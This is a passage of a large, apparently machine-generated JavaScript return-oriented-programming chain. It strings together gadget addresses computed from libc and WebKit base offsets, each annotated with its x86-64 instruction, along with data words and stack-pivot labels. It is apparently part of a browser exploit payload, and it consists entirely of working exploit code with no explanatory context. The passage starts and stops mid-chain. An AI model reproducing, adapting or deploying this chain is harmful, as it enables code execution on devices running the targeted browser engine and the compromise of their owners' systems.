rsi ropchain+409080, //L8585 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8584: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8585: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+409240, //L8589 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+409208, //L8587 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+409224, //L8588 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8586: db([24, 0]); // 0x18 
set_gadget(webkit_base+3236123,); //pop r9 //L8587: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8588: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8589: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+409296, //L8591 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L8591: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+409424, //L8593 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+409440, //L8594 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+409408, //L8592 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8592: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L8593: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8594: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+409600, //L8598 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+409568, //L8596 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+409584, //L8597 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8595: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L8596: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8597: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8598: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+409656, //L8600 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L8600: db([0, 
0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+409784, //L8602 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+409800, //L8603 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+409768, //L8601 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8601: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L8602: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8603: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+409960, //L8607 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+409928, //L8605 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+409944, //L8606 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8604: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L8605: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8606: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8607: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+410016, //L8609 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L8609: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+410144, //L8611 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+410160, //L8612 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+410128, //L8610 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+763368 //pop rcx ]); //L8610: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L8611: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8612: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+410240, //L8613 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+410256, //L8614 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8613: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8614: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+410352, //L8616 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+410336, //L8615 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8615: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8616: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+410432, //L8617 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8617: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8618: db([120, 0]); // 0x78 set_gadget(libc_base+144605,); //pop rdi //L8619: db([120, 0]); // 0x78 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+410576, //L8620 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+410608, //L8622 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+410592, //L8621 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop 
rcx ]); //L8620: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8621: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8622: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+410776, //L8624 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+410792, //L8625 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+410760, //L8623 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8623: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8624: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8625: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+410952, //L8630 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+410968, //L8631 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+410904, //L8627 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8627: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8628: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L8629: db([1, 0]); // 0x1 set_gadget(webkit_base+3236123,); //pop r9 //L8630: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8631: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+411088, //L8632+8 
libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+411080, //L8632 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L8632: db([0, 0]); // 0x0 set_gadgets([ ropchain+411104, //L8632+24 ropchain+413312, //L8626 libc_base+764760, //pop rsi ropchain+411144, //L8633 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L8633: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8635: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+411264, //L8638 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+411248, //L8636 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L8636: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8638: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+411344, //L8639 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+411360, //L8640 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8639: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8640: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+411520, //L8644 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+411488, //L8642 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+411504, //L8643 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8641: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L8642: db([0, 
0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8643: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8644: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+411576, //L8646 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L8646: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+411704, //L8648 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+411720, //L8649 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+411688, //L8647 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8647: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L8648: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8649: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+411880, //L8653 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+411848, //L8651 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+411864, //L8652 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8650: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L8651: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8652: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8653: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+411936, //L8655 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L8655: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl 
libc_base+764760, //pop rsi ropchain+412064, //L8657 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+412080, //L8658 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+412048, //L8656 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8656: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L8657: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8658: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+412240, //L8662 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+412208, //L8660 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+412224, //L8661 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8659: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L8660: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8661: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8662: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+412296, //L8664 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L8664: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+412424, //L8666 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+412440, //L8667 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+412408, //L8665 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8665: db([0, 0]); // 0x0 
set_gadget(webkit_base+3236123,); //pop r9 //L8666: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8667: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+412520, //L8668 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+412536, //L8669 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8668: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8669: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+412632, //L8671 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+412616, //L8670 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8670: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8671: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+412712, //L8672 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8672: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8673: db([88, 0]); // 0x58 set_gadget(libc_base+144605,); //pop rdi //L8674: db([88, 0]); // 0x58 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+412856, //L8675 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+412888, //L8677 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+412872, //L8676 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8675: db([0, 0]); // 0x0 
set_gadget(libc_base+144605,); //pop rdi //L8676: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8677: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+413056, //L8679 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+413072, //L8680 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+413040, //L8678 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8678: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8679: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8680: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+413216, //L8683 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+413232, //L8684 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+413184, //L8681 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8681: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8682: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L8683: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8684: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+413304, //L8685 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L8685: db([0, 0]); // 0x0 //L8626: 
set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+413432, //L8688 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+413448, //L8689 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+413416, //L8687 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8687: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8688: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8689: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+413560, //L8691 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+413608, //L8694 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+413576, //L8692 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8691: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8692: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8693: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8694: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+413720, //L8695+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+413712, //L8695 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L8695: db([0, 0]); // 0x0 set_gadgets([ ropchain+413736, //L8695+24 ropchain+413976, //L8690 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+413792, //L8697 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop 
rcx ]); //L8696: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L8697: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8698: db([16, 0]); // 0x10 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+413872, //L8699 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L8699: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8701: db([4294967252, 4294967295]); // -0x2c set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+764760, //pop rsi ropchain+413952, //L8703 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L8703: db([0, 0]); // 0x0 set_gadgets([ libc_base+782311, //pop rsp ropchain+420168, //L8702 //L8690: libc_base+764760, //pop rsi ropchain+414016, //L8705 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L8705: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8707: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+414136, //L8710 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+414120, //L8708 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L8708: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8710: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+414216, //L8711 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+414232, //L8712 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8711: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax 
//L8712: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+414392, //L8716 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+414360, //L8714 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+414376, //L8715 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8713: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L8714: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8715: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8716: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+414448, //L8718 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L8718: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+414576, //L8720 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+414592, //L8721 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+414560, //L8719 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8719: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L8720: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8721: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+414752, //L8725 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+414720, //L8723 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+414736, //L8724 webkit_base+660161, //mov [rsi], rax ; 
mov al, 1 libc_base+763368 //pop rcx ]); //L8722: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L8723: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8724: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8725: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+414808, //L8727 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L8727: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+414936, //L8729 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+414952, //L8730 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+414920, //L8728 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8728: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L8729: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8730: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+415112, //L8734 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+415080, //L8732 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+415096, //L8733 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8731: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L8732: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8733: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8734: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+415168, //L8736 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
